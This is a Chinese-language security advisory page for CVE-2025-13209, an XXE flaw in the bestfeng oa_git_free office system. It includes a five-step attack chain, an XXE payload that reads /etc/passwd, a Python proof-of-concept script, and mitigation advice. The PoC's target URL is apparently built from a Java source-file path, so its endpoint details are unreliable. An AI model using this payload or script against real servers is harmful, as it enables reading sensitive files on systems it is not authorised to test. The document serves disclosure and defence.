CVE-2025-13209 CVSS 6.3 中危

CVE-2025-13209 bestfeng oa_git_free XXE漏洞

披露日期: 2025-11-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13209

漏洞类型

XXE (XML外部实体注入)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

bestfeng oa_git_free (云飞扬协同办公系统)

漏洞概述

CVE-2025-13209是bestfeng oa_git_free协同办公系统中的一个中等严重性安全漏洞，CVSS评分6.3。该漏洞存在于WorkflowPredefineController.java文件的updateWriteBack函数中，源于对writeProp参数的处理不当，允许XML外部实体引用。攻击者可通过构造恶意XML payload，利用系统对外部实体的解析来读取服务器敏感文件或执行拒绝服务攻击。此漏洞影响9.5及以下版本，攻击可远程发起，无需高权限认证。由于相关漏洞利用代码已在公开渠道发布，建议相关用户尽快采取防护措施。

技术细节

该漏洞为典型的XXE(XML External Entity Injection)注入漏洞，位于bestfeng oa_git_free 9.5版本的WorkflowPredefineController.java文件中updateWriteBack函数。漏洞成因是应用程序在处理XML输入时，未对用户可控的writeProp参数进行充分的输入验证和安全过滤，导致攻击者可以在XML文档中注入外部实体引用。当应用程序解析包含恶意外部实体的XML时，会尝试访问攻击者指定的外部资源，可能导致：1) 读取服务器本地文件(如/etc/passwd、配置文件等)；2) 执行SSRF攻击探测内网服务；3) 触发拒绝服务使服务崩溃。攻击者只需构造包含<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>的恶意XML payload，通过writeProp参数提交即可触发漏洞。

攻击链分析

STEP 1

步骤1

收集目标信息：识别使用bestfeng oa_git_free协同办公系统的目标服务器

STEP 2

步骤2

定位漏洞接口：访问/yimioa-oa9.5/server/c-flow/src/main/java/com/cloudweb/oa/controller/WorkflowPredefineController.java中的updateWriteBack函数

STEP 3

步骤3

构造恶意XML payload：创建包含外部实体引用的XML文档，如<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

STEP 4

步骤4

发送攻击请求：通过HTTP POST请求将恶意XML作为writeProp参数值提交到updateWriteBack端点

STEP 5

步骤5

获取敏感数据：服务器解析XML时会尝试读取并返回外部实体指定的文件内容，攻击者由此获取服务器敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13209 XXE PoC for bestfeng oa_git_free
# Target: /WorkflowPredefineController/updateWriteBack endpoint

TARGET_URL = "http://target.com/yimioa-oa9.5/server/c-flow/WorkflowPredefineController"

# XXE payload to read local file
xxe_payload = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <writeProp>&xxe;</writeProp>
</root>'''

def exploit(target_url, payload):
    """Send XXE payload to vulnerable endpoint"""
    headers = {
        'Content-Type': 'application/xml',
        'User-Agent': 'Mozilla/5.0'
    }
    try:
        response = requests.post(
            target_url + '/updateWriteBack',
            data=payload,
            headers=headers,
            timeout=10
        )
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response:\n{response.text}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    print("[*] CVE-2025-13209 XXE PoC")
    print("[*] Target: bestfeng oa_git_free <= 9.5")
    exploit(TARGET_URL, xxe_payload)

影响范围

bestfeng oa_git_free <= 9.5

防御指南

临时缓解措施

在等待官方修复期间，建议采取以下临时缓解措施：1) 在Web应用防火墙(WAF)上配置规则，检测和拦截包含<!DOCTYPE、<!ENTITY等XXE特征的请求；2) 限制服务器网络访问权限，防止敏感数据外传；3) 使用应用运行时保护(RASP)技术监控可疑的XML解析行为；4) 定期审计日志，及时发现异常攻击痕迹；5) 实施最小权限原则，限制应用程序的文件系统访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表